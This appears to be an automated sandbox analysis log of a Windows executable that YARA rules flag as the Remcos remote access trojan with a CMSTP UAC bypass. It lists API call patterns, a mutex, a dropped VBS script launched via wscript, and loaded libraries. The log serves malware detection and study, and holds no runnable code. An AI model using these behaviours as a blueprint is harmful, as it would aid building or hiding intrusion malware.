                        Spam, unwanted Advertisements and Ransom Demands

Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe | Code function: 0_2_0041BB87 SystemParametersInfoW,0_2_0041BB87

System Summary

Source: 17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe, type: SAMPLE | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe, type: SAMPLE | Matched rule: REMCOS_RAT_variants Author: unknown
Source: 17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe, type: SAMPLE | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 0.0.17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 0.0.17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
Source: 0.0.17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 0.2.17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 0.2.17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
Source: 0.2.17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 00000000.00000000.1409380957.0000000000457000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: Process Memory Space: 17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe PID: 7784, type: MEMORYSTR | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe | Process Stats: CPU usage > 49%
Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe | Code function: 0_2_0041ACD1 OpenProcess,NtSuspendProcess,CloseHandle
Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe | Code function: 0_2_0041ACFD OpenProcess,NtResumeProcess,CloseHandle
Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe | Code function: 0_2_004158B9 ExitWindowsEx,LoadLibraryA,GetProcAddress
Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe | Code function: 0_2_004520E2
Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe | Code function: 0_2_0041D081
Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe | Code function: 0_2_0043D0A8
Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe | Code function: 0_2_00437160
Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe | Code function: 0_2_004361BA
Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe | Code function: 0_2_00426264
Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe | Code function: 0_2_00431387
Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe | Code function: 0_2_0043652C
Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe | Code function: 0_2_0041E5EF
Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe | Code function: 0_2_0044C749
Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe | Code function: 0_2_004367D6
Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe | Code function: 0_2_004267DB
Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe | Code function: 0_2_0043C9ED
Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe | Code function: 0_2_00432A59
Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe | Code function: 0_2_00436A9D
Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe | Code function: 0_2_0043CC1C
Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe | Code function: 0_2_00436D58
Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe | Code function: 0_2_00434D32
Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe | Code function: 0_2_0043CE4B
Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe | Code function: 0_2_00440E30
Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe | Code function: 0_2_00426E83
Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe | Code function: 0_2_00412F45
Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe | Code function: 0_2_00452F10
Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe | Code function: 0_2_00426FBD
Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe | Code function: String function: 00401F66 appears 50 times
Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe | Code function: String function: 004020E7 appears 40 times
Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe | Code function: String function: 004338B5 appears 42 times
Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe | Code function: String function: 00433FC0 appears 55 times
Source: 17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe | Static PE information: Resource name: RT_RCDATA type: COM executable for DOS
Source: 17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe, 00000000.00000002.3307385684.0000000000872000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamewscript.exe` vs 17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe
Source: 17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe, 00000000.00000002.3307385684.000000000086D000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamewscript.exe.mui` vs 17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe
Source: 17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe, type: SAMPLE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe, type: SAMPLE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe, type: SAMPLE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 0.0.17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 0.0.17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0.0.17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 0.2.17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 0.2.17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0.2.17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 00000000.00000000.1409380957.0000000000457000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Process Memory Space: 17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe PID: 7784, type: MEMORYSTR | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: classification engine | Classification label: mal100.rans.troj.spyw.expl.evad.winEXE@3/3@2/2
Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe | Code function: 0_2_00416AB7 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError
Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe | Code function: 0_2_0040E219 GetModuleFileNameW,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,CloseHandle
Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe | Code function: 0_2_0041A64F FindResourceA,LoadResource,LockResource,SizeofResource
Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe | Code function: 0_2_00419BD4 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle
Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\json[1].json
Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe | Mutant created: \Sessions\1\BaseNamedObjects\Rmc-IUHLZ9
Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe | File created: C:\Users\user\AppData\Local\Temp\bmdbmsbytqzebij.vbs
Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\bmdbmsbytqzebij.vbs"
Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe | Command line argument: XCG | 0_2_0040D767
Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe | Command line argument: Software\ | 0_2_0040D767
Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe | Command line argument: Rmc-IUHLZ9 | 0_2_0040D767
Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe | Command line argument: Exe | 0_2_0040D767
Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe | Command line argument: 0DG | 0_2_0040D767
Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe | Command line argument: Inj | 0_2_0040D767
Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe | Command line argument: BG | 0_2_0040D767
Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe | Command line argument: @CG | 0_2_0040D767
Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe | Command line argument: exepath | 0_2_0040D767
Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe | Command line argument: licence | 0_2_0040D767
Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe | Command line argument: `=G | 0_2_0040D767
Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe | Command line argument: dCG | 0_2_0040D767
Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe | Command line argument: Administrator | 0_2_0040D767
Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe | Command line argument: User | 0_2_0040D767
Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe | Command line argument: del | 0_2_0040D767
Source: 17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: 17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe | ReversingLabs: Detection: 71%
Source: unknown | Process created: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe "C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe"
Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\bmdbmsbytqzebij.vbs"
Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe | Section loaded: wininet.dll
Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe | Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe | Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe | Section loaded: fwpuclnt.dll
Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe | Section loaded: propsys.dll
Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe | Section loaded: edputil.dll
Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe | Section loaded: policymanager.dll
Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe | Section loaded: msvcp110_win.dll
Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe | Section loaded: appresolver.dll
                        Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeSection loaded: bcp47langs.dllJump to behavior
                        Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeSection loaded: slc.dllJump to behavior
                        Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeSection loaded: sppc.dllJump to behavior
                        Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                        Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vbscript.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dllJump to behavior
